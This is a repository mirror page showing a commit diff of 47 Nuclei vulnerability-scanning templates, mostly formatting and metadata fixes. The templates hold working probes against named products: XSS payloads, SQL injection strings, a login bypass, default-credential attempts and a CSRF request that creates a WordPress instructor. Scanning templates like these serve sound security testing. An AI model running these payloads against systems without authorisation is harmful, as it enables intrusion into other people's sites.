daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

fixed errors

patch-1
Prince Chaddha 2023-10-17 13:46:05 +05:30
parent 1b2fddb9cb
commit c1b18b3f06
47 changed files with 148 additions and 177 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

36
http/cve/2023/CVE-2023-37728.yaml
View File

@ -1,36 +0,0 @@
id: CVE-2023-37728
info:
name: Icewarp Icearp v10.2.1 - Cross Site Scripting
author: r3Y3r53
severity: medium
description: |
Icewarp Icearp v10.2.1 was discovered to contain a cross-site scripting (XSS) vulnerability via the color parameter.
reference:
- https://medium.com/@ayush.engr29/cve-2023-37728-6dfb7586311
- https://nvd.nist.gov/vuln/detail/CVE-2023-37728
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cwe-id: CWE-79
metadata:
max-request: 2
verified: true
shodan-query: http.favicon.hash:2144485375
tags: cve,cve2023,icearp,icewarp,xss
http:
- method: GET
path:
- "{{BaseURL}}/webmail/?color=%22%3e%3cimg%20src%20onerror%3dalert(document.domain)%3e%3c%22%27"
- "{{BaseURL}}/?color=%22%3e%3cimg%20src%20onerror%3dalert(document.domain)%3e%3c%22%27"
stop-at-first-match: true
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains(header, "IceWarp") || contains(body, "IceWarp WebClient")'
- 'contains(body, "<img src onerror=alert(document.domain)>")'
condition: and

22
http/cves/2020/CVE-2020-10220.yaml
View File

@ -2,26 +2,36 @@ id: CVE-2020-10220
info:
name: rConfig 3.9 - SQL Injection
author: theamanrawat
author: ritikchaddha,theamanrawat
severity: critical
description: |
An issue was discovered in rConfig through 3.9.4. The web interface is prone to a SQL injection via the commands.inc.php searchColumn parameter.
remediation: |
Upgrade to a patched version of rConfig or apply the vendor-supplied patch to mitigate this vulnerability.
reference:
- https://www.rconfig.com/downloads/rconfig-3.9.4.zip
- https://www.exploit-db.com/exploits/48208
- http://packetstormsecurity.com/files/156950/rConfig-3.9.4-searchField-Remote-Code-Execution.html
- https://nvd.nist.gov/vuln/detail/CVE-2020-10220
- http://packetstormsecurity.com/files/156688/rConfig-3.9-SQL-Injection.html
- http://packetstormsecurity.com/files/156766/Rconfig-3.x-Chained-Remote-Code-Execution.html
- https://github.com/v1k1ngfr/exploits-rconfig/blob/master/rconfig_CVE-2020-10220.py
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-10220
cwe-id: CWE-89
epss-score: 0.02204
epss-percentile: 0.88193
cpe: cpe:2.3:a:rconfig:rconfig:*:*:*:*:*:*:*:*
metadata:
verified: true
shodan-query: http.title:"rConfig"
tags: cve,cve2020,rconfig,sqli
max-request: 1
vendor: rconfig
product: rconfig
shodan-query: title:"rConfig"
tags: packetstorm,cve,cve2020,rconfig,sqli
variables:
num: 999999999
num: "999999999"
http:
- method: GET

8
http/cves/2020/CVE-2020-8615.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2020-8615
info:
name: Wordpress Plugin Tutor LMS 1.5.3 - Cross-Site Request Forgery
name: Wordpress Plugin Tutor LMS 1.5.3 - Cross-Site Request Forgery
author: r3Y3r53
severity: medium
description: |
@ -36,14 +36,14 @@ http:
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=add_new_instructor&first_name={{firstname}}&last_name={{lastname}}&user_login={{user}}&email={{email}}&phone_number=1231231231&password={{pass}}&password_confirmation={{pass}}&tutor_profile_bio=Et+tempore+culpa+n&action=tutor_add_instructor
cookie-reuse: true

2
http/cves/2021/CVE-2021-24215.yaml
View File

@ -32,7 +32,7 @@ http:
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/options.php HTTP/1.1
GET /wp-admin/options.php HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true

2
http/cves/2021/CVE-2021-24791.yaml
View File

@ -17,8 +17,8 @@ info:
cwe-id: CWE-89
metadata:
verified: true
google-query: inurl: "/plugins/header-footer-code-manager/"
max-request: 1
google-query: inurl:"/wp-content/plugins/wp-custom-pages/"
tags: cve,cve2021,sqli,wp,wordpress,wp-plugin,authenticated,header-footer-code-manager
http:

2
http/cves/2021/CVE-2021-24979.yaml
View File

@ -42,4 +42,4 @@ http:
- 'contains(header_2, "text/html")'
- 'contains(body_2, "style=animation-name:rotation+onanimationstart=alert(document.domain)//")'
- 'contains(body_2, "Paid Memberships Pro - Membership Plugin for WordPress")'
condition: and
condition: and

48
http/cves/2021/CVE-2021-25016.yaml
View File

@ -1,38 +1,52 @@
id: CVE-2021-25016
info:
name: Chaty Free < 2.8.3 & Pro < 2.8.2 - Cross-Site Scripting
author: r3Y3r53
name: Chaty < 2.8.2 - Cross-Site Scripting
author: luisfelipe146
severity: medium
description: |
The plugins do not sanitise and escape the search parameter before outputting it back in the admin dashboard, leading to a Reflected Cross-Site Scripting
The Chaty WordPress plugin before 2.8.3 and Chaty Pro WordPress plugin before 2.8.2 do not sanitise and escape the search parameter before outputting it back in the admin dashboard, leading to a Reflected Cross-Site Scripting.
remediation: Fixed in 2.8.3
reference:
- https://wpscan.com/vulnerability/b5035987-6227-4fc6-bc45-1e8016e5c4c0
- https://nvd.nist.gov/vuln/detail/CVE-2021-25016
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25016
classification:
cve-id: CVE-2021-25016
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cwe-id: CWE-79
metadata:
max-request: 2
verified: true
tags: cve,cve2023,wpscan,wordpress,authenticated,wp-plugin,xss,chaty
publicwww-query: "/wp-content/plugins/chaty/"
tags: cve,cve2021,wordpress,wp-plugin,xss,authenticated,chaty
http:
- raw:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/admin.php?page=chaty-contact-form-feed&search=%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3e HTTP/1.1
GET /wp-admin/admin.php?page=chaty-contact-form-feed&search=%3C%2Fscript%3E%3Cimg+src+onerror%3Dalert%28document.domain%29%3E HTTP/1.1
Host: {{Hostname}}
stop-at-first-match: true
redirects: true
cookie-reuse: true
matchers-condition: and
matchers:
- type: dsl
dsl:
- 'status_code_2 == 200'
- 'contains(body_2, "<script>alert(document.domain)</script>")'
- 'contains(body_2, "Chaty")'
condition: and
- type: word
part: body
words:
- "search=</script><img src onerror=alert(document.domain)>"
- "chaty_page_chaty"
condition: and
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

4
http/cves/2021/CVE-2021-25079.yaml
View File

@ -6,7 +6,7 @@ info:
description: |
The plugin does not sanitise and escape various parameters, such as form_id, status, end_date, order, orderby and search before outputting them back in the admin page
remediation: Fixed in version 1.1.7
reference:
reference:
- https://wpscan.com/vulnerability/c3d49271-9656-4428-8357-0d1d77b7fc63
- https://nvd.nist.gov/vuln/detail/CVE-2021-25079
- https://wordpress.org/plugins/contact-form-entries/
@ -27,7 +27,7 @@ http:
- |
GET /wp-admin/admin.php?page=vxcf_leads&form_id=cf_5&status&tab=entries&search&order=asc&orderby=file-438&field&time&start_date&end_date=onobw%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3Ez2u4g HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers:
- type: dsl

2
http/cves/2022/CVE-2022-0651.yaml
View File

@ -6,7 +6,7 @@ info:
severity: critical
description: |
The WP Statistics WordPress plugin is vulnerable to SQL Injection due to insufficient escaping and parameterization of the current_page_type parameter found in the ~/includes/class-wp-statistics-hits.php file which allows attackers without authentication to inject arbitrary SQL queries to obtain sensitive information, in versions up to and including 13.1.5.
remediation: Update wp-statistics plugin to version 13.1.6, or newer.
remediation: Update wp-statistics plugin to version 13.1.6, or newer.
reference:
- https://wordpress.org/plugins/wp-statistics/
- https://gist.github.com/Xib3rR4dAr/5dbd58b7f57a5037fe461fba8e696042

4
http/cves/2022/CVE-2022-0814.yaml
View File

@ -1,4 +1,4 @@
id: CVE-2022-0814
id: CVE-2022-0814
info:
name: Ubigeo de Peru < 3.6.4 - SQL Injection
@ -6,7 +6,7 @@ info:
severity: critical
description: |
The plugin does not properly sanitise and escape some parameters before using them in SQL statements via various AJAX actions, some of which are available to unauthenticated users, leading to SQL Injections.
reference:
reference:
- https://wpscan.com/vulnerability/fd84dc08-0079-4fcf-81c3-a61d652e3269
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0814
- https://wordpress.org/plugins/ubigeo-peru/

2
http/cves/2022/CVE-2022-25148.yaml
View File

@ -6,7 +6,7 @@ info:
severity: critical
description: |
The WP Statistics WordPress plugin is vulnerable to SQL Injection due to insufficient escaping and parameterization of the current_page_id parameter found in the ~/includes/class-wp-statistics-hits.php file which allows attackers without authentication to inject arbitrary SQL queries to obtain sensitive information, in versions up to and including 13.1.5.
remediation: Update wp-statistics plugin to version 13.1.6, or newer.
remediation: Update wp-statistics plugin to version 13.1.6, or newer.
reference:
- https://wordpress.org/plugins/wp-statistics/
- https://gist.github.com/Xib3rR4dAr/5dbd58b7f57a5037fe461fba8e696042

6
http/cves/2022/CVE-2022-2535.yaml
View File

@ -3,17 +3,17 @@ id: CVE-2022-2535
info:
name: SearchWP Live Ajax Search < 1.6.2 - Unauthenticated Arbitrary Post Title Disclosure
author: r3Y3r53
severity: Medium
severity: medium
description: |
The plugin does not ensure that users making. alive search are limited to published posts only, allowing unauthenticated users to make a crafted query disclosing private/draft/pending post titles along with their permalink
remediation: Fixed in version 1.6.2
reference:
- https://wpscan.com/vulnerability/0e13c375-044c-4c2e-ab8e-48cb89d90d02
- https://nvd.nist.gov/vuln/detail/CVE-2022-2535
- https://nvd.nist.gov/vuln/detail/CVE-2022-2535
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2022-2535
cve-id: CVE-2022-2535
cwe-id: CWE-639
metadata:
max-request: 1

8
http/cves/2022/CVE-2022-3242.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2022-3242
info:
name: Microweber <1.3.2 - Cross-Site Scripting
name: Microweber <1.3.2 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
@ -13,7 +13,7 @@ info:
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cwe-id: CWE-79
cwe-id: CWE-79
cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:*
metadata:
max-request: 1
@ -30,5 +30,5 @@ http:
dsl:
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains(body, "<script>alert(document.domain)</script>") && contains(tolower(body), "microweber")'
condition: and
- 'contains(body, "<script>alert(document.domain)</script>") && contains(tolower(body), "microweber")'
condition: and

2
http/cves/2022/CVE-2022-34093.yaml
View File

@ -17,7 +17,7 @@ info:
cpe: cpe:2.3:a:i3geo_project:i3geo:7.0.5:*:*:*:*:*:*:*
metadata:
verified: true
tags: cve,cve2022,i3geo,xss
tags: cve,cve2022,i3geo,xss
http:
- method: GET

2
http/cves/2022/CVE-2022-34094.yaml
View File

@ -17,7 +17,7 @@ info:
cpe: cpe:2.3:a:i3geo_project:i3geo:7.0.5:*:*:*:*:*:*:*
metadata:
verified: true
tags: cve,cve2022,i3geo,xss
tags: cve,cve2022,i3geo,xss
http:
- method: GET

16
http/cves/2022/CVE-2022-40047.yaml
View File

@ -5,7 +5,7 @@ info:
author: r3Y3r53
severity: medium
description: |
Flatpress v1.2.1 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the page parameter at /flatpress/admin.php.
Flatpress v1.2.1 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the page parameter at /flatpress/admin.php.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2022-40047
- https://github.com/flatpressblog/flatpress/issues/153
@ -16,33 +16,33 @@ info:
tags: cve,cve2022,flatpress,authenticated,xss
variables:
randstring: "{{to_lower(rand_base(16))}}"
randstring: "{{to_lower(rand_base(16))}}"
http:
- raw:
- raw:
- |
POST /login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{randstring}}
------WebKitFormBoundary{{randstring}}
Content-Disposition: form-data; name="user"
{{username}}
------WebKitFormBoundary{{randstring}}
Content-Disposition: form-data; name="pass"
{{password}}
------WebKitFormBoundary{{randstring}}
Content-Disposition: form-data; name="submit"
Login
------WebKitFormBoundary{{randstring}}--
- |
GET /admin.php?p=static&action=write&page=%22onfocus%3d%22alert%28document.domain%29%22autofocus%3d%22zr4da HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers:
- type: dsl

2
http/cves/2023/CVE-2023-0600.yaml
View File

@ -10,7 +10,7 @@ info:
reference:
- https://wpscan.com/vulnerability/8f46df4d-cb80-4d66-846f-85faf2ea0ec4
- https://nvd.nist.gov/vuln/detail/CVE-2023-0600
classification:
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-0600

8
http/cves/2023/CVE-2023-2009.yaml
View File

@ -17,18 +17,18 @@ info:
http:
- raw:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log=((username))&pwd={{password}}&wp-submit=Log+In
log=((username))&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/admin.php?page=prettyurls HTTP/1.1
Host: {{Hostname}}
- |
POST /wp-admin/admin.php?page=prettyurls HTTP/1.1
Host: {{Hostname}}
@ -53,4 +53,4 @@ http:
part: body
group: 1
regex:
- 'name="_wpnonce" value="([0-9a-z]+)" />'
- 'name="_wpnonce" value="([0-9a-z]+)" />'

2
http/cves/2023/CVE-2023-2779.yaml
View File

@ -7,7 +7,7 @@ info:
description: |
The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.
remediation: Fixed in version 7.13.52
reference:
reference:
- https://wpscan.com/vulnerability/fe9b7696-3b0e-42e2-9dbc-55167605f5c5
- https://nvd.nist.gov/vuln/detail/CVE-2023-2779
- https://wordpress.org/plugins/super-socializer/

2
http/cves/2023/CVE-2023-27922.yaml
View File

@ -15,7 +15,7 @@ info:
tags: cve,cve2023,wordpress,wp,wp-plugin,xss,newsletter,authenticated
http:
- raw:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}

8
http/cves/2023/CVE-2023-36306.yaml
View File

@ -6,14 +6,14 @@ info:
severity: medium
description: |
A Cross Site Scripting (XSS) vulnerability in Adiscon Aiscon LogAnalyzer through 4.1.13 allows a remote attacker to execute arbitrary code via the asktheoracle.php
reference:
- https://www.exploit-db.com/exploits/51643
- https://nvd.nist.gov/vuln/detail/CVE-2023-36306
reference:
- https://www.exploit-db.com/exploits/51643
- https://nvd.nist.gov/vuln/detail/CVE-2023-36306
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-36306
cwe-id: CWE-79
cwe-id: CWE-79
metadata:
verified: true
tags: cve,cve2023,xss,unauth,exploitdb,adiscon,adiscon-loganalyzer

47
http/cves/2023/CVE-2023-37728.yaml
View File

@ -1,51 +1,36 @@
id: CVE-2023-37728
info:
name: IceWarp Webmail Server - Cross-Site Scripting
author: technicaljunkie
name: Icewarp Icearp v10.2.1 - Cross Site Scripting
author: r3Y3r53
severity: medium
description: |
IceWarp Webmail Server contains a cross-site scripting vulnerability in the /webmail/ color parameter.
Icewarp Icearp v10.2.1 was discovered to contain a cross-site scripting (XSS) vulnerability via the color parameter.
reference:
- https://medium.com/@ayush.engr29/cve-2023-37728-6dfb7586311
- https://nvd.nist.gov/vuln/detail/CVE-2023-37728
- https://medium.com/@ayush29/cve-2023-37728-6dfb7586311
- http://icearp.com
- http://icewarp.com
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-37728
cwe-id: CWE-79
epss-score: 0.00052
epss-percentile: 0.18493
cpe: cpe:2.3:a:icewarp:icewarp:10.2.1:*:*:*:*:*:*:*
metadata:
max-request: 2
verified: true
max-request: 1
vendor: icewarp
product: icewarp
shodan-query: title:"icewarp"
tags: cve,cve2023,xss,icewarp
shodan-query: http.favicon.hash:2144485375
tags: cve,cve2023,icearp,icewarp,xss
http:
- method: GET
path:
- '{{BaseURL}}/webmail/?color=%22%3E%3Cimg%20src%20onerror=%22alert(document.domain)%22%3E%3C%22%27'
- "{{BaseURL}}/webmail/?color=%22%3e%3cimg%20src%20onerror%3dalert(document.domain)%3e%3c%22%27"
- "{{BaseURL}}/?color=%22%3e%3cimg%20src%20onerror%3dalert(document.domain)%3e%3c%22%27"
matchers-condition: and
stop-at-first-match: true
matchers:
- type: word
part: body
words:
- '><img src onerror="alert(document.domain)"><'
- 'IceWarp'
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains(header, "IceWarp") || contains(body, "IceWarp WebClient")'
- 'contains(body, "<img src onerror=alert(document.domain)>")'
condition: and
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200

4
http/cves/2023/CVE-2023-38501.yaml
View File

@ -2,7 +2,7 @@ id: CVE-2023-38501
info:
name: CopyParty v1.8.6 - Cross Site Scripting
author: r3Y3r53
author: ctflearner,r3Y3r53
severity: medium
description: |
Copyparty is a portable file server. Versions prior to 1.8.6 are subject to a reflected cross-site scripting (XSS) Attack.Vulnerability that exists in the web interface of the application could allow an attacker to execute malicious javascript code by tricking users into accessing a malicious link.
@ -14,7 +14,7 @@ info:
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cwe-id: CWE-79
cwe-id: CWE-79
metadata:
verified: true
max-request: 1

2
http/cves/2023/CVE-2023-4112.yaml
View File

@ -27,7 +27,7 @@ http:
- method: GET
path:
- "{{BaseURL}}/index.php/gm5rj%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3Ebwude?controller=pjAdmin&action=pjActionLogin&err=1"
matchers:
- type: dsl
dsl:

4
http/default-logins/eurotel/etl3100-default-login.yaml
View File

@ -5,7 +5,7 @@ info:
author: r3Y3r53
severity: high
description: |
The TV and FM transmitter uses a weak set of default administrative credentials that can be guessed in remote password attacks and gain full control of the system.
The TV and FM transmitter uses a weak set of default administrative credentials that can be guessed in remote password attacks and gain full control of the system.
reference:
- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5782.php
- https://www.exploit-db.com/exploits/51684
@ -26,7 +26,7 @@ http:
txtUserId={{username}}&txtPassword={{password}}&btnLogin=Login
- |
GET /exciter.php HTTP/1.1
GET /exciter.php HTTP/1.1
Host: {{Hostname}}
attack: pitchfork

2
http/default-logins/franklin-fueling-default-login.yaml
View File

@ -20,7 +20,7 @@ http:
POST /21408623/cgi-bin/tsaws.cgi HTTP/1.1
Host: {{Hostname}}
Content-Type: text/xml
<TSA_REQUEST_LIST PASSWORD="{{password}}"><TSA_REQUEST COMMAND="cmdWebCheckRole" ROLE="{{username}}"/></TSA_REQUEST_LIST>
attack: pitchfork

3
http/exposures/logs/redv-super-logs.yaml
View File

@ -10,7 +10,6 @@ info:
- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5609.php
metadata:
verified: true
tags: redv,log,disclosure,exposure
http:
@ -24,4 +23,4 @@ http:
- 'status_code == 200'
- 'contains(content_type, "text/plain")'
- 'contains_all(body, "Log file", "[LogParser]", "[INFO]")'
condition: and
condition: and

8
http/vulnerabilities/joomla/joomla-com-booking-component.yaml
View File

@ -1,7 +1,7 @@
id: joomla-com-booking-component
info:
name: Joomla! com_booking component 2.4.9 - Information Leak
name: Joomla! com_booking component 2.4.9 - Information Leak
author: r3Y3r53
severity: high
description: |
@ -19,12 +19,12 @@ http:
- raw:
- |
GET /index.php?option=com_booking&controller=customer&task=getUserData&id=123 HTTP/1.1
host-redirects: true
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'status_code == 200'
- 'contains(body, "name") && contains(body, "username") && contains(body, "email")'
- 'contains(content_type, "text/html")'
condition: and
condition: and

2
http/vulnerabilities/other/ep-web-cms-xss.yaml
View File

@ -1,7 +1,7 @@
id: ep-web-cms-xss
info:
name: EP Web Solutions CMS - Cross Site Scripting
name: EP Web Solutions CMS - Cross Site Scripting
author: r3Y3r53
severity: medium
description: |

2
http/vulnerabilities/other/erensoft-sqli.yaml
View File

@ -1,7 +1,7 @@
id: erensoft-sqli
info:
name: ErenSoft - SQL Injection
name: ErenSoft - SQL Injection
author: r3Y3r53
severity: high
description: |

4
http/vulnerabilities/other/indonasia-toko-cms-sql.yaml
View File

@ -1,7 +1,7 @@
id: indonasia-toko-cms-sql
info:
name: Indonasia Toko CMS - SQL Injection
name: Indonasia Toko CMS - SQL Injection
author: r3Y3r53
severity: high
description: |
@ -20,7 +20,7 @@ http:
POST /kinerja-alumni/index.php?mnu=login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
user=%27+or+1%3D1+limit+1+--+-%2B&pass=%27+or+1%3D1+limit+1+--+-%2B&Login=Login
matchers-condition: and

2
http/vulnerabilities/other/joomla-jlex-review-xss.yaml
View File

@ -25,6 +25,6 @@ http:
- type: dsl
dsl:
- 'contains_all(body, "confirm(document.domain)", "Joomla")'
- 'contains(content_type, "text/html")'
- 'contains(content_type, "text/html")'
- 'status_code == 200'
condition: and

8
http/vulnerabilities/other/joomla-jmarket-xss.yaml
View File

@ -19,11 +19,11 @@ http:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jvouchers&controller=catalog-results&task=query&wajx=1&wmjx=1&tmpl=component&type=raw&crtyid=12&trucs[x][search]=gx3vt%20onfocus=alert(document.domain)%20autofocus=%20itkrzsug7w5"
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains_all(body, "onfocus=alert(document.domain) autofocus=", "catalog-results", "joomla")'
condition: and
- 'contains(content_type, "text/html")'
- 'contains_all(body, "onfocus=alert(document.domain) autofocus=", "catalog-results", "joomla")'
condition: and

4
http/vulnerabilities/other/khodrochi-cms-xss.yaml
View File

@ -1,12 +1,12 @@
id: khodrochi-cms-xss
info:
name: Khodrochi CMS - Cross-Site Scripting
name: Khodrochi CMS - Cross Site Scripting
author: r3Y3r53
severity: medium
description: |
A cross site scripting vulnerability was found in the Khodrochi.ir CMS an Iranian Car Services Platform.
reference:
reference:
- https://www.exploitalert.com/view-details.html?id=38723
- https://cxsecurity.com/ascii/WLB-2022050087
metadata:

2
http/vulnerabilities/other/phuket-cms-sqli.yaml
View File

@ -9,7 +9,7 @@ info:
reference:
- https://www.exploitalert.com/view-details.html?id=36234
metadata:
max-request: 2
max-request: 2
google-dork: intext:"Developed by Phuket Solution"
verified: true
tags: phuket,sqli,phuket-cms

6
http/vulnerabilities/other/rentequip-xss.yaml
View File

@ -9,7 +9,7 @@ info:
reference:
- https://vulners.com/packetstorm/PACKETSTORM:173002
- https://www.exploitalert.com/view-details.html?id=39611
- https://codecanyon.net/user/kreativdev/portfolio
- https://codecanyon.net/user/kreativdev/portfolio
metadata:
verified: true
max-request: 1
@ -19,11 +19,11 @@ http:
- method: GET
path:
- "{{BaseURL}}/shop/products?category=cordless-tools&min=1026553%3balert(document.domain)%2f%2f772"
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'status_code == 200'
- 'contains(body, "rentequip") && contains(body, "1026553;alert(document.domain)//772")'
- 'contains(content_type, "text/html")'
condition: and

4
http/vulnerabilities/other/shoowbiz-xss.yaml
View File

@ -1,10 +1,10 @@
id: shoowbiz-xss
info:
name: SHOOWBIZ - Cross Site Scripting
name: SHOOWBIZ - Cross Site Scripting
author: r3Y3r53
severity: medium
description: |
Cross-Site Scripting, is a type of security vulnerability commonly found in web applications. It occurs when an attacker injects malicious scripts (typically written in JavaScript) into web pages viewed by other users.
Cross-Site Scripting, is a type of security vulnerability commonly found in web applications. It occurs when an attacker injects malicious scripts (typically written in JavaScript) into web pages viewed by other users.
reference:
- https://www.exploitalert.com/view-details.html?id=36000
metadata:

2
http/vulnerabilities/other/sound4-impact-auth-bypass.yaml
View File

@ -19,7 +19,7 @@ http:
POST /index.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username=%27%2Bjoxvy--%2Bz&password=ffesdf
redirects: true

2
http/vulnerabilities/other/stackposts-sqli.yaml
View File

@ -17,7 +17,7 @@ info:
tags: sqli,unauth,stackposts
http:
- raw:
- raw:
- |
@timeout: 15s
POST /spre/auth/login HTTP/2

2
http/vulnerabilities/wordpress/photoblocks-grid-gallery-xss.yaml
View File

@ -29,5 +29,5 @@ http:
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains(body, "<svg/onload=alert(document.domain)>")'
- 'contains(body, "PhotoBlocks")'
- 'contains(body, "PhotoBlocks")'
condition: and

2
http/vulnerabilities/wordpress/wp-ellipsis-xss.yaml
View File

@ -6,7 +6,7 @@ info:
severity: medium
description: |
The 'page' GET parameter of the inc/protected-forms-table.php file was affected by a reflected XSS vulnerability.
reference:
reference:
- https://wpscan.com/vulnerability/c0a138d8-93ac-463c-b650-d849352c0b44
- https://packetstormsecurity.com/files/154393/
- https://wordpress.org/plugins/ellipsis-human-presence-technology/

4
http/vulnerabilities/wordpress/wp-mega-theme.yaml
View File

@ -7,8 +7,8 @@ info:
description: |
WordPress theme with a 'Mega-Theme' design is vulnerable to a reflected XSS attack through the '?s=' parameter.
reference:
- https://cxsecurity.com/issue/WLB-2021120027
- https://www.zhaket.com/web/megawp-wordpress-theme
- https://cxsecurity.com/issue/WLB-2021120027
- https://www.zhaket.com/web/megawp-wordpress-theme
metadata:
google-query: Megawp-Theme
verified: true

2
http/vulnerabilities/wordpress/wp-portrait-archiv-xss.yaml
View File

@ -6,7 +6,7 @@ info:
severity: medium
description: |
The 'pDetails' GET parameter from the js/imageDetails.php was vulnerable to an unauthenticated reflected XSS attack.
reference:
reference:
- https://wpscan.com/vulnerability/c6a8757e-41ef-4c20-8c7d-97b57d56fe0e
- https://wordpress.org/plugins/portrait-archiv-shop/
- https://packetstormsecurity.com/files/154343/

1
http/vulnerabilities/wordpress/wp-qwiz-online-xss.yaml
View File

@ -11,7 +11,6 @@ info:
- https://wpscan.com/vulnerability/d3c10f69-87b6-43fd-bcbc-c2d35b683ff4
- https://packetstormsecurity.com/files/154403/
- https://wordpress.org/plugins/qwiz-online-quizzes-and-flashcards/
remediation: Fixed in version 3.37
metadata:
publicwww-query: "/wp-content/plugins/qwiz-online-quizzes-and-flashcards/"
verified: true

2
http/vulnerabilities/wordpress/wp-reality-estate-theme.yaml
View File

@ -28,7 +28,7 @@ http:
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains_all(body, "reality", "estate", "><img src=x onerror=(alert)(document.domain)")'
condition: and

10
http/vulnerabilities/wordpress/wp-statistics-sqli.yaml
View File

@ -6,11 +6,11 @@ info:
severity: high
description: |
WordPress Plugin WP Statistics 13.0.7 contains an unauthenticated Time based SQL injection vulnerability. The plugin does not sanitize and escape the id parameter before using it in a SQL statement, leading to an unauthenticated blind SQL injection. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
reference:
- https://www.exploit-db.com/exploits/49894
- https://www.acunetix.com/vulnerabilities/web/wordpress-plugin-wp-statistics-sql-injection-13-0-7/
- https://www.wordfence.com/blog/2021/05/over-600000-sites-impacted-by-wp-statistics-patch/
- https://wordpress.org/plugins/wp-statistics/
reference:
- https://www.exploit-db.com/exploits/49894
- https://www.acunetix.com/vulnerabilities/web/wordpress-plugin-wp-statistics-sql-injection-13-0-7/
- https://www.wordfence.com/blog/2021/05/over-600000-sites-impacted-by-wp-statistics-patch/
- https://wordpress.org/plugins/wp-statistics/
metadata:
verified: true
max-request: 1

6
http/vulnerabilities/wordpress/wp-superstorefinder-misconfig.yaml
View File

@ -5,7 +5,7 @@ info:
author: r3Y3r53
severity: medium
description: |
Security misconfiguration is a common security issue that occurs when a system, application, or network is not properly configured to protect against threats and vulnerabilities.
Security misconfiguration is a common security issue that occurs when a system, application, or network is not properly configured to protect against threats and vulnerabilities.
reference:
- https://cxsecurity.com/issue/WLB-2021010145
- https://www.exploitalert.com/view-details.html?id=36983
@ -24,7 +24,7 @@ http:
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "Name") && contains(body, "CategoriesTags") && contains(body, "email")'
- 'status_code == 200'
- 'contains(body, "Name") && contains(body, "CategoriesTags") && contains(body, "email")'
- 'contains(content_type, "text/html")'
condition: and